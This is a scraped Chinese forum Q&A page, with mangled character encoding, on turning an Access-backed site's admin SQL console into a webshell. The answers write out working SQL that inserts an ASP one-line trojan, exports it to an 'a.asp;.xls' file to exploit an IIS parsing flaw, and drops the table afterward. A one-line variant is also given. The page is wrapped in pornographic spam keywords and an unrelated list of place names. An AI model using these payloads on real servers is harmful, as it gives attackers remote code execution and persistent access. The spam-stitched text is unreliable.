最新国产好看的视频,伊人天堂AV在线,国产Aaaaaa视频,蜜臀视频在线观看一区,人妻av色图,密臀久久久精品影片,青青视频免费观看毛片,久草在线观看视,国产三级精品色情在线

ACCESS數(shù)據(jù)庫后臺sql語句執(zhí)行導(dǎo)shell的方法

  發(fā)布時(shí)間:2011-03-31 21:50:06   作者:佚名   我要評論
一個(gè)垃圾論壇,access數(shù)據(jù)庫,無其他可利用之處,不過有個(gè)sql語句執(zhí)行功能,絕對路徑也知道,小弟對sql語句不懂,記得如果是mysql數(shù)據(jù)庫root權(quán)限可以導(dǎo)出SHELL,這個(gè)是否也能導(dǎo)出shell呢?
需要什么條件,語句又是什么?網(wǎng)上翻不到資料。麻煩各位。

答:

create table cmd (a varchar(50))
insert into cmd (a) values ('<%execute request("a")%>')
select * into [a] in 'f:\host\qhdyxt\web\a.asp;.xls' 'excel 4.0;' from cmd
drop table cmd

解釋如下:
1.create table a (a varchar(50)) 建立一個(gè)有一個(gè)A字段的表 表名為a 字段類型為字符 長度為50
2.insert into a (a) values ('<%execute request("a")%>') 在表a的a字段插入密碼為a的一句話木馬
3.select * into [a] in 'F:\jt\work\a.asp;.xls' 'excel 4.0;' from a 把表a的內(nèi)容導(dǎo)出為物理路徑的一個(gè)
EXCEL文件,為什么用excel文件,因?yàn)锳CCESS數(shù)據(jù)庫不允許導(dǎo)出其他危險(xiǎn)格式。我們導(dǎo)出為EXCEL后在利用IIS解析漏洞就可以變成我們的小馬了。很*的說~~
4.drop table a 丟家伙閃人 射完就走!

小弟的提問,沒兩分鐘大家就回答了,強(qiáng)烈頂t00ls牛淫。

這個(gè)更簡單:

Access利用后臺SQL執(zhí)行命令功能導(dǎo)出WebShell:
SELECT '<%execute request("a")%>' into [vote] in 'd:\web\x.asp;.xls' 'excel 8.0;' from vote
后臺提供SQL執(zhí)行功能且知道絕對路徑方可使用(vote為已知表段)

相關(guān)文章

最新評論

香港 | 宜章县| 河南省| 长宁县| 甘南县| 延安市| 天镇县| 南乐县| 涟源市| 赤水市| 化隆| 长葛市| 罗山县| 黎川县| 邹平县| 都匀市| 连平县| 亚东县| 延安市| 平塘县| 海伦市| 右玉县| 宝坻区| 平塘县| 依安县| 合水县| 彭山县| 花莲市| 孙吴县| 台山市| 丰镇市| 黄平县| 宁波市| 罗城| 南川市| 藁城市| 东乌珠穆沁旗| 宝鸡市| 迭部县| 建宁县| 长垣县|